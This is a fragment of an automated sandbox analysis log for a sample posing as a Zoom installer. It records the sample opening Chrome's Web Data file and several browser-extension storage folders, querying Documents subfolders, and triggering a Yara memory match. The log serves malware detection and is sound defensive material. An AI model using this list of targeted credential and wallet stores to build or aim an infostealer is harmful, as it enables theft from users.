Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: Yara match File source: Process Memory Space: ZoomInstaller.exe PID: 7284, type: MEMORYSTR